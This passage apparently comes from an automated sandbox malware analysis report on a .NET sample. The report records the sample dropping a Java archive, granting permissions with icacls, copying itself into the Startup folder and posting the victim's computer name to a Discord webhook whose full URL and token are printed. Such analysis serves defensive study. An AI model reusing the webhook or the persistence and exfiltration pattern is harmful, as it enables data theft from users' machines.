                                                                                    Set-Cookie: __sdcfduid=42c24d3ea3fa11edbdfe6a4fbaaa61985885e32d90048a8d12d79532d5f41de647bb0353409d6f78bcac0d5982c08894; Expires=Wed, 02-Feb-2028 19:37:57 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                                                                    Set-Cookie: __cfruid=f5b09a76d80f9af3cbb0fd386f3f967242bfdb90-1675453077; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    3192.168.2.349692162.159.137.232443C:\Users\user\Desktop\uBZeAVcb6r.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    2023-02-03 19:38:07 UTC4OUTPOST /api/webhooks/1061591881189961839/KwqGODsud5jnEMwoLx_f6PdyZpFgjhKU-fUjwmwXiSSOBri5CuGLlgGvA4a7d18uh4zS HTTP/1.1
                                                                                    Content-Type: application/json
                                                                                    Host: canary.discord.com
                                                                                    Content-Length: 62
                                                                                    Expect: 100-continue
                                                                                    Connection: Keep-Alive
                                                                                    2023-02-03 19:38:07 UTC5INHTTP/1.1 100 Continue
                                                                                    2023-02-03 19:38:07 UTC5OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 43 6f 6e 6e 65 63 74 65 64 20 46 6f 72 6d 20 41 75 74 6f 53 74 61 72 74 3a 20 20 43 6f 6d 70 75 74 65 72 2d 4e 61 6d 65 3a 39 33 36 39 30 35 22 7d
                                                                                    Data Ascii: {"content": "Connected Form AutoStart: Computer-Name:936905"}
                                                                                    2023-02-03 19:38:07 UTC5INHTTP/1.1 204 No Content
                                                                                    Date: Fri, 03 Feb 2023 19:38:07 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    CF-Ray: 793da003490a997b-FRA
                                                                                    Set-Cookie: __dcfduid=48a07c1ca3fa11edb45d6a4fbaaa6198; Expires=Wed, 02-Feb-2028 19:38:07 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Via: 1.1 google
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                    X-Content-Type-Options: nosniff
                                                                                    x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                    x-ratelimit-limit: 5
                                                                                    x-ratelimit-remaining: 4
                                                                                    x-ratelimit-reset: 1675453088
                                                                                    x-ratelimit-reset-after: 1
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hAS0ZLaKeA9whYWFCKwVx%2F8M9pSawKgyHEPlehn7SG3fhPZC0HWO3xJ7MbVwB5wB7URnyARPqltBS%2FJzEqY02qrtVKco%2BF3qViB8hRGkmaEh4e2BrpKpvPLQinIpIUPI2TY6%2FA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: __sdcfduid=48a07c1ca3fa11edb45d6a4fbaaa6198e9e40669ebbc461332346476238a1f31568de4e1ca2923a4f4a94cb0cc2f5f52; Expires=Wed, 02-Feb-2028 19:38:07 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                                                                    Set-Cookie: __cfruid=7594ec6cbfd17fffa43ef9d894453e935e2011e3-1675453087; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare


                                                                                    Statistics

                                                                                    CPU Usage

                                                                                    Click to jump to process

                                                                                    Memory Usage

                                                                                    Click to jump to process

                                                                                    High Level Behavior Distribution

                                                                                    Click to dive into process behavior distribution

                                                                                    Behavior

                                                                                    Click to jump to process

                                                                                    System Behavior

                                                                                    General

                                                                                    Target ID:0
                                                                                    Start time:20:37:27
                                                                                    Start date:03/02/2023
                                                                                    Path:C:\Users\user\Desktop\uBZeAVcb6r.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\user\Desktop\uBZeAVcb6r.exe
                                                                                    Imagebase:0xbe0000
                                                                                    File size:30208 bytes
                                                                                    MD5 hash:A5A4B316CC349DB892A27C9B5429DD4E
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:.Net C# or VB.NET
                                                                                    Reputation:low

                                                                                    General

                                                                                    Target ID:1
                                                                                    Start time:20:37:29
                                                                                    Start date:03/02/2023
                                                                                    Path:C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe" -jar "C:\Users\user\AppData\Local\Temp\jarva.jar"
                                                                                    Imagebase:0x8e0000
                                                                                    File size:192376 bytes
                                                                                    MD5 hash:4BFEB2F64685DA09DEBB95FB981D4F65
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:Java
                                                                                    Reputation:high

                                                                                    General

                                                                                    Target ID:2
                                                                                    Start time:20:37:32
                                                                                    Start date:03/02/2023
                                                                                    Path:C:\Windows\SysWOW64\icacls.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
                                                                                    Imagebase:0x1310000
                                                                                    File size:29696 bytes
                                                                                    MD5 hash:FF0D1D4317A44C951240FAE75075D501
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high

                                                                                    General

                                                                                    Target ID:3
                                                                                    Start time:20:37:32
                                                                                    Start date:03/02/2023
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff745070000
                                                                                    File size:625664 bytes
                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high

                                                                                    General

                                                                                    Target ID:9
                                                                                    Start time:20:37:41
                                                                                    Start date:03/02/2023
                                                                                    Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exe"
                                                                                    Imagebase:0xc40000
                                                                                    File size:30720 bytes
                                                                                    MD5 hash:94CCB92B775297F357670ABD1E6F754B
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:.Net C# or VB.NET
                                                                                    Antivirus matches:
                                                                                    • Detection: 100%, Avira
                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                    • Detection: 29%, ReversingLabs
                                                                                    Reputation:low

                                                                                    General

                                                                                    Target ID:13
                                                                                    Start time:20:37:47
                                                                                    Start date:03/02/2023
                                                                                    Path:C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe" -jar "C:\Users\user\AppData\Local\Temp\jarva.jar"
                                                                                    Imagebase:0x8e0000
                                                                                    File size:192376 bytes
                                                                                    MD5 hash:4BFEB2F64685DA09DEBB95FB981D4F65
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high

                                                                                    General

                                                                                    Target ID:14
                                                                                    Start time:20:37:55
                                                                                    Start date:03/02/2023
                                                                                    Path:C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exe"
                                                                                    Imagebase:0x7a0000
                                                                                    File size:30720 bytes
                                                                                    MD5 hash:94CCB92B775297F357670ABD1E6F754B
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:.Net C# or VB.NET
                                                                                    Antivirus matches:
                                                                                    • Detection: 100%, Avira
                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                    • Detection: 29%, ReversingLabs
                                                                                    Reputation:low

                                                                                    General

                                                                                    Target ID:15
                                                                                    Start time:20:37:56
                                                                                    Start date:03/02/2023
                                                                                    Path:C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe" -jar "C:\Users\user\AppData\Local\Temp\jarva.jar"
                                                                                    Imagebase:0x8e0000
                                                                                    File size:192376 bytes
                                                                                    MD5 hash:4BFEB2F64685DA09DEBB95FB981D4F65
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high

                                                                                    General

                                                                                    Target ID:16
                                                                                    Start time:20:38:04
                                                                                    Start date:03/02/2023
                                                                                    Path:C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exe"
                                                                                    Imagebase:0xc50000
                                                                                    File size:30720 bytes
                                                                                    MD5 hash:94CCB92B775297F357670ABD1E6F754B
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:.Net C# or VB.NET
                                                                                    Reputation:low

                                                                                    General

                                                                                    Target ID:17
                                                                                    Start time:20:38:06
                                                                                    Start date:03/02/2023
                                                                                    Path:C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe" -jar "C:\Users\user\AppData\Local\Temp\jarva.jar"
                                                                                    Imagebase:0x8e0000
                                                                                    File size:192376 bytes
                                                                                    MD5 hash:4BFEB2F64685DA09DEBB95FB981D4F65
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high

                                                                                    Disassembly

                                                                                    Reset < >

                                                                                      Execution Graph

                                                                                      Execution Coverage:12%
                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                      Signature Coverage:0%
                                                                                      Total number of Nodes:130
                                                                                      Total number of Limit Nodes:10
                                                                                      execution_graph 10099 1314230 10100 131425a 10099->10100 10101 13142aa 10100->10101 10105 1314699 10100->10105 10110 13139cc 10101->10110 10103 1314530 10106 13146bd 10105->10106 10114 1314789 10106->10114 10118 1314798 10106->10118 10111 13139d7 10110->10111 10126 1315fa4 10111->10126 10113 1317505 10113->10103 10116 13147bf 10114->10116 10115 131489c 10115->10115 10116->10115 10122 1313a0c 10116->10122 10119 13147bf 10118->10119 10120 1313a0c CreateActCtxA 10119->10120 10121 131489c 10119->10121 10120->10121 10123 1315828 CreateActCtxA 10122->10123 10125 13158eb 10123->10125 10127 1315faf 10126->10127 10130 1315fc4 10127->10130 10129 13175e5 10129->10113 10131 1315fcf 10130->10131 10134 1315ff4 10131->10134 10133 1317aca 10133->10129 10135 1315fff 10134->10135 10138 1317670 10135->10138 10137 1317bc2 10137->10133 10139 131767b 10138->10139 10140 131831c 10139->10140 10142 131c1b8 10139->10142 10140->10137 10143 131c1e9 10142->10143 10144 131c20d 10143->10144 10148 131c335 10143->10148 10153 131c378 10143->10153 10157 131c367 10143->10157 10144->10140 10149 131c34b 10148->10149 10150 131c393 10148->10150 10149->10144 10152 131c31f 10150->10152 10161 131ae64 10150->10161 10152->10144 10154 131c385 10153->10154 10155 131ae64 5 API calls 10154->10155 10156 131c3bf 10154->10156 10155->10156 10156->10144 10158 131c385 10157->10158 10159 131c3bf 10158->10159 10160 131ae64 5 API calls 10158->10160 10159->10144 10160->10159 10162 131ae69 10161->10162 10164 131d0b8 10162->10164 10165 131af04 10162->10165 10164->10164 10166 131af0f 10165->10166 10167 1317670 5 API calls 10166->10167 10168 131d127 10167->10168 10169 131d135 10168->10169 10179 131d190 10168->10179 10187 131d1a0 10168->10187 10195 131caa4 10169->10195 10171 131d14f 10200 131cab4 10171->10200 10173 131d156 10204 131ee88 10173->10204 10209 131ee70 10173->10209 10174 131d160 10174->10164 10180 131d1a0 10179->10180 10181 131d1f7 10180->10181 10182 131cb30 GetFocus 10180->10182 10186 131d30b 10180->10186 10183 131d29f 10181->10183 10185 131d29a KiUserCallbackDispatcher 10181->10185 10181->10186 10182->10181 10184 131cab4 LoadLibraryExW GetModuleHandleW 10183->10184 10183->10186 10184->10186 10185->10183 10189 131d1ce 10187->10189 10188 131d1f7 10191 131d29f 10188->10191 10193 131d29a KiUserCallbackDispatcher 10188->10193 10194 131d30b 10188->10194 10189->10188 10190 131cb30 GetFocus 10189->10190 10189->10194 10190->10188 10192 131cab4 LoadLibraryExW GetModuleHandleW 10191->10192 10191->10194 10192->10194 10193->10191 10196 131caaf 10195->10196 10197 131cd34 LoadLibraryExW GetModuleHandleW 10196->10197 10199 131e2a1 10196->10199 10198 131e29c 10197->10198 10198->10171 10199->10171 10201 131cabf 10200->10201 10202 131e880 LoadLibraryExW GetModuleHandleW 10201->10202 10203 131ecb7 10202->10203 10203->10173 10205 131eeb9 10204->10205 10206 131eec5 10204->10206 10205->10206 10207 131f308 LoadLibraryExW GetModuleHandleW 10205->10207 10208 131f2f8 LoadLibraryExW GetModuleHandleW 10205->10208 10206->10174 10207->10206 10208->10206 10210 131ee83 10209->10210 10211 131eec5 10210->10211 10212 131f308 LoadLibraryExW GetModuleHandleW 10210->10212 10213 131f2f8 LoadLibraryExW GetModuleHandleW 10210->10213 10211->10174 10212->10211 10213->10211 10214 131c490 GetCurrentProcess 10215 131c503 10214->10215 10216 131c50a GetCurrentThread 10214->10216 10215->10216 10217 131c540 10216->10217 10218 131c547 GetCurrentProcess 10216->10218 10217->10218 10219 131c57d 10218->10219 10220 131c5a5 GetCurrentThreadId 10219->10220 10221 131c5d6 10220->10221 10222 131a0d0 10225 131a1c8 10222->10225 10223 131a0df 10226 131a1db 10225->10226 10227 131a1f3 10226->10227 10233 131a450 10226->10233 10237 131a440 10226->10237 10227->10223 10228 131a1eb 10228->10227 10229 131a3f0 GetModuleHandleW 10228->10229 10230 131a41d 10229->10230 10230->10223 10234 131a464 10233->10234 10236 131a489 10234->10236 10241 1319500 10234->10241 10236->10228 10238 131a464 10237->10238 10239 1319500 LoadLibraryExW 10238->10239 10240 131a489 10238->10240 10239->10240 10240->10228 10242 131a610 LoadLibraryExW 10241->10242 10244 131a689 10242->10244 10244->10236 10247 131ec80 10248 131ec8b 10247->10248 10250 131ecb7 10247->10250 10248->10250 10251 131e880 10248->10251 10252 131e88b 10251->10252 10253 131ee29 10252->10253 10255 131ed8a 10252->10255 10256 131ee70 2 API calls 10252->10256 10257 131ee88 2 API calls 10252->10257 10253->10250 10254 131e880 2 API calls 10254->10255 10255->10253 10255->10254 10256->10255 10257->10255 10245 131c6b8 DuplicateHandle 10246 131c74e 10245->10246

                                                                                      Executed Functions

                                                                                      Function 0131C48F Relevance: 6.1, APIs: 4, Instructions: 121threadCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32 ref: 0131C4F0
                                                                                      • GetCurrentThread.KERNEL32 ref: 0131C52D
                                                                                      • GetCurrentProcess.KERNEL32 ref: 0131C56A
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0131C5C3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.523638964.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_1310000_uBZeAVcb6r.jbxd
                                                                                      Similarity
                                                                                      • API ID: Current$ProcessThread
                                                                                      • String ID:
                                                                                      • API String ID: 2063062207-0
                                                                                      • Opcode ID: db45371690bbe5d5389dc677d48392b650c72e7700c8dbfde7512435ac93bbad
                                                                                      • Instruction ID: 3e4f80779c0190258ade01b76bbf21476a2770453962452b6b7de320f2181d50
                                                                                      • Opcode Fuzzy Hash: db45371690bbe5d5389dc677d48392b650c72e7700c8dbfde7512435ac93bbad
                                                                                      • Instruction Fuzzy Hash: 7A5155B8900249CFDB18CFAAD948BDEBFF1FB48318F20845DE019A7254D7755988CB65
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0131C490 Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32 ref: 0131C4F0
                                                                                      • GetCurrentThread.KERNEL32 ref: 0131C52D
                                                                                      • GetCurrentProcess.KERNEL32 ref: 0131C56A
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0131C5C3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.523638964.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_1310000_uBZeAVcb6r.jbxd
                                                                                      Similarity
                                                                                      • API ID: Current$ProcessThread
                                                                                      • String ID:
                                                                                      • API String ID: 2063062207-0
                                                                                      • Opcode ID: 9f571d21e7bfc3a20cea1fd5d712d5773a7a9222385b95aa78a332b311146923
                                                                                      • Instruction ID: 56f9d51ad719dc42899d518607547f593a271683111021786a2bfb1ff96d4123
                                                                                      • Opcode Fuzzy Hash: 9f571d21e7bfc3a20cea1fd5d712d5773a7a9222385b95aa78a332b311146923
                                                                                      • Instruction Fuzzy Hash: BC5154B8900249CFDB18CFAAC948BDEBFF1FB48318F20845DE019A7254D7756988CB65
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0131A1C8 Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0131A40E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.523638964.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_1310000_uBZeAVcb6r.jbxd
                                                                                      Similarity
                                                                                      • API ID: HandleModule
                                                                                      • String ID:
                                                                                      • API String ID: 4139908857-0
                                                                                      • Opcode ID: 31e68ae9bb8a8fe9c4a55db4587c3096415d83ad6cb02de490272e6615742a98
                                                                                      • Instruction ID: 6a41cae24ab5bfc8c97abff61d94829c50f10ec2cebe4453bb1e8de0c8993034
                                                                                      • Opcode Fuzzy Hash: 31e68ae9bb8a8fe9c4a55db4587c3096415d83ad6cb02de490272e6615742a98
                                                                                      • Instruction Fuzzy Hash: 55713670A01B458FD728CF6AD45079ABBF1FF88319F00892DD44AD7B44DB75E8468B91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01313A0C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 96 1313a0c-13158e9 CreateActCtxA 99 13158f2-131594c 96->99 100 13158eb-13158f1 96->100 107 131595b-131595f 99->107 108 131594e-1315951 99->108 100->99 109 1315961-131596d 107->109 110 1315970 107->110 108->107 109->110
                                                                                      APIs
                                                                                      • CreateActCtxA.KERNEL32(?), ref: 013158D9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.523638964.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_1310000_uBZeAVcb6r.jbxd
                                                                                      Similarity
                                                                                      • API ID: Create
                                                                                      • String ID:
                                                                                      • API String ID: 2289755597-0
                                                                                      • Opcode ID: 62d4fe3763c8572aed664ba9f90319cc36e6b25c8fb564e983d703684b48823f
                                                                                      • Instruction ID: f1ae2e119c6779cb50484e2a82a47090172f80d7b6d80e0ea87512b2b7860a02
                                                                                      • Opcode Fuzzy Hash: 62d4fe3763c8572aed664ba9f90319cc36e6b25c8fb564e983d703684b48823f
                                                                                      • Instruction Fuzzy Hash: C141E271D0021DCADB24CFA9C84478EBBB6BF89318F208069D409AB254DBB55985CF91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0131C6B2 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 112 131c6b2-131c6b7 113 131c6b8-131c74c DuplicateHandle 112->113 114 131c755-131c772 113->114 115 131c74e-131c754 113->115 115->114
                                                                                      APIs
                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0131C73F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.523638964.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_1310000_uBZeAVcb6r.jbxd
                                                                                      Similarity
                                                                                      • API ID: DuplicateHandle
                                                                                      • String ID:
                                                                                      • API String ID: 3793708945-0
                                                                                      • Opcode ID: e072f088c06833ff5ec474f313a56e5c131ed944bab2bfe5f8ad0efde3da3fbc
                                                                                      • Instruction ID: 289a55e5771e0f0ab90a7cf053f07c30f781dca42380ffc76c6cedf50f5f5486
                                                                                      • Opcode Fuzzy Hash: e072f088c06833ff5ec474f313a56e5c131ed944bab2bfe5f8ad0efde3da3fbc
                                                                                      • Instruction Fuzzy Hash: FA21E9B59003099FDB10CFA9D984ADEBFF9FB48324F14841AE954A7310D378A944CFA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0131C6B8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 118 131c6b8-131c74c DuplicateHandle 119 131c755-131c772 118->119 120 131c74e-131c754 118->120 120->119
                                                                                      APIs
                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0131C73F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.523638964.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_1310000_uBZeAVcb6r.jbxd
                                                                                      Similarity
                                                                                      • API ID: DuplicateHandle
                                                                                      • String ID:
                                                                                      • API String ID: 3793708945-0
                                                                                      • Opcode ID: daba9373af8a8ae820f39ac0c4aade471dfb8a3ef31f350b5936919c4e35a0a9
                                                                                      • Instruction ID: 3e3a400ea8b2dd62b1fbaaa3166b41437f4ffbe24eead0668d9983d29ffdd4d6
                                                                                      • Opcode Fuzzy Hash: daba9373af8a8ae820f39ac0c4aade471dfb8a3ef31f350b5936919c4e35a0a9
                                                                                      • Instruction Fuzzy Hash: 1B21E6B59002089FDB10CF9AD984ADEBFF9EB48314F14841AE914A3310D378A944CFA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 01319500 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 123 1319500-131a650 125 131a652-131a655 123->125 126 131a658-131a687 LoadLibraryExW 123->126 125->126 127 131a690-131a6ad 126->127 128 131a689-131a68f 126->128 128->127
                                                                                      APIs
                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0131A489,00000800,00000000,00000000), ref: 0131A67A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.523638964.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_1310000_uBZeAVcb6r.jbxd
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID:
                                                                                      • API String ID: 1029625771-0
                                                                                      • Opcode ID: 799b7818b15b5ac4077482e8fdad235484cc1a224ee7d322bec95fb754473dcc
                                                                                      • Instruction ID: e80b8ab0ba8cc116f28a90164d7333a999421b8bbd0b451eece5b79d0ad0f64c
                                                                                      • Opcode Fuzzy Hash: 799b7818b15b5ac4077482e8fdad235484cc1a224ee7d322bec95fb754473dcc
                                                                                      • Instruction Fuzzy Hash: 7E1106B69012498FDB14CF9AC444ADEFBF5AB88324F10841EE519B7600C375A545CFA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0131A60C Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 131 131a60c-131a650 133 131a652-131a655 131->133 134 131a658-131a687 LoadLibraryExW 131->134 133->134 135 131a690-131a6ad 134->135 136 131a689-131a68f 134->136 136->135
                                                                                      APIs
                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0131A489,00000800,00000000,00000000), ref: 0131A67A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.523638964.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_1310000_uBZeAVcb6r.jbxd
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID:
                                                                                      • API String ID: 1029625771-0
                                                                                      • Opcode ID: 98251e84d230629f811e367bb8666f2ed87ea055ef1947153c57805d0d86dc4e
                                                                                      • Instruction ID: 3872eaa273c6598ad72ff52dcb9baa550fe930318ae1cc0f8e9019168a26846b
                                                                                      • Opcode Fuzzy Hash: 98251e84d230629f811e367bb8666f2ed87ea055ef1947153c57805d0d86dc4e
                                                                                      • Instruction Fuzzy Hash: 371126B6C003499FDB14CF9AC844ADEFBF5AB88324F10841EE519B7610C379A545CFA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0131A3A8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 139 131a3a8-131a3e8 140 131a3f0-131a41b GetModuleHandleW 139->140 141 131a3ea-131a3ed 139->141 142 131a424-131a438 140->142 143 131a41d-131a423 140->143 141->140 143->142
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0131A40E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.523638964.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_1310000_uBZeAVcb6r.jbxd
                                                                                      Similarity
                                                                                      • API ID: HandleModule
                                                                                      • String ID:
                                                                                      • API String ID: 4139908857-0
                                                                                      • Opcode ID: edb78d1eb3c537d9b04db04cbe10958126270771cd8506174a284c7c38add7e5
                                                                                      • Instruction ID: 04a7f818d202e95cce70619fd41090dafd86527600156f80a61cd127a4216f15
                                                                                      • Opcode Fuzzy Hash: edb78d1eb3c537d9b04db04cbe10958126270771cd8506174a284c7c38add7e5
                                                                                      • Instruction Fuzzy Hash: 1E1113B5C002498FDB14CF9AC844BDEFBF4EB88328F10841AD419B7200C779A545CFA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 012BD500 Relevance: .1, Instructions: 75COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.522936834.00000000012BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012BD000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_12bd000_uBZeAVcb6r.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6672c3e16f6642586eb2b14f978e7e8fc2dfabb4fabdac888e22c3a1801c318c
                                                                                      • Instruction ID: 522f7accfea9c1577a8092d5457545e8fe5f1b91be7e2c5ed2b195fe85b9997d
                                                                                      • Opcode Fuzzy Hash: 6672c3e16f6642586eb2b14f978e7e8fc2dfabb4fabdac888e22c3a1801c318c
                                                                                      • Instruction Fuzzy Hash: 34212475510248DFDB16CF58E9C0BA6BF65FB8835CF248569D9050A206C336D846CBA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 012BD414 Relevance: .1, Instructions: 75COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
